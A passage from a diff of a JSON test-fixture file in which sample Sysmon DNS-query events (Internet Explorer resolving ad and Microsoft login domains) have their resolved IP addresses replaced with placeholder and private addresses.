Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1116,7 +1116,7 @@ "event_data": { "QueryName": "nym1-ib.adnxs.com", "QueryStatus": "0", - "QueryResults": "::ffff:68.67.178.252;::ffff:68.67.179.11;::ffff:68.67.179.228;::ffff:68.67.178.184;::ffff:204.13.192.141;::ffff:68.67.180.43;::ffff:68.67.179.23;::ffff:68.67.179.197;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.633", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1135,7 +1135,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029159100Z'/\u003e\u003cEventRecordID\u003e86\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.633\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003enym1-ib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:68.67.178.252;::ffff:68.67.179.11;::ffff:68.67.179.228;::ffff:68.67.178.184;::ffff:204.13.192.141;::ffff:68.67.180.43;::ffff:68.67.179.23;::ffff:68.67.179.197;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029159100Z'/\u003e\u003cEventRecordID\u003e86\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.633\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003enym1-ib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { @@ -1144,7 +1144,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029240500Z'/\u003e\u003cEventRecordID\u003e87\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.716\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eeb2.3lift.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:34.196.86.129;::ffff:34.233.250.110;::ffff:18.209.244.108;::ffff:34.224.204.11;::ffff:34.237.44.255;::ffff:3.210.231.21;::ffff:54.172.198.255;::ffff:34.199.186.227;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029240500Z'/\u003e\u003cEventRecordID\u003e87\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.716\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eeb2.3lift.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "computer_name": "vagrant-2016", @@ -1157,7 +1157,7 @@ "ProcessId": "2736", "QueryName": "eb2.3lift.com", "QueryStatus": "0", - "QueryResults": "type: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:34.196.86.129;::ffff:34.233.250.110;::ffff:18.209.244.108;::ffff:34.224.204.11;::ffff:34.237.44.255;::ffff:3.210.231.21;::ffff:54.172.198.255;::ffff:34.199.186.227;192.5.6.30;", + "QueryResults": "type: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.716", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -1182,7 +1182,7 @@ "event": { "code": "22", "kind": "event", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029251400Z'/\u003e\u003cEventRecordID\u003e88\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.727\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epx.ads.linkedin.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:108.174.10.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029251400Z'/\u003e\u003cEventRecordID\u003e88\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.727\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epx.ads.linkedin.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon" }, "winlog": { @@ -1202,7 +1202,7 @@ "event_data": { "QueryName": "px.ads.linkedin.com", "QueryStatus": "0", - "QueryResults": "type: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:108.174.10.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.727", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1228,7 +1228,7 @@ "winlog": { "time_created": "2019-07-18T03:34:03.029Z", "event_data": { - "QueryResults": "type: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:40.90.23.239;::ffff:40.90.23.213;::ffff:40.90.23.154;", + "QueryResults": "type: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.733", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1259,7 +1259,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029260200Z'/\u003e\u003cEventRecordID\u003e89\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.733\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elogin.live.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:40.90.23.239;::ffff:40.90.23.213;::ffff:40.90.23.154;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029260200Z'/\u003e\u003cEventRecordID\u003e89\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.733\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elogin.live.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { @@ -1268,7 +1268,7 @@ "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029315200Z'/\u003e\u003cEventRecordID\u003e90\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edis.criteo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:74.119.119.150;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029315200Z'/\u003e\u003cEventRecordID\u003e90\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edis.criteo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "version": 5, @@ -1287,7 +1287,7 @@ "ProcessId": "2736", "QueryName": "dis.criteo.com", "QueryStatus": "0", - "QueryResults": "::ffff:74.119.119.150;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.792" }, @@ -1311,7 +1311,7 @@ { "@timestamp": "2021-05-05T15:30:51.696Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029331100Z'/\u003e\u003cEventRecordID\u003e91\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.180.12;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029331100Z'/\u003e\u003cEventRecordID\u003e91\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -1330,7 +1330,7 @@ "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "level": "information", "event_data": { - "QueryResults": "type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.180.12;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.792", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1352,7 +1352,7 @@ "event": { "kind": "event", 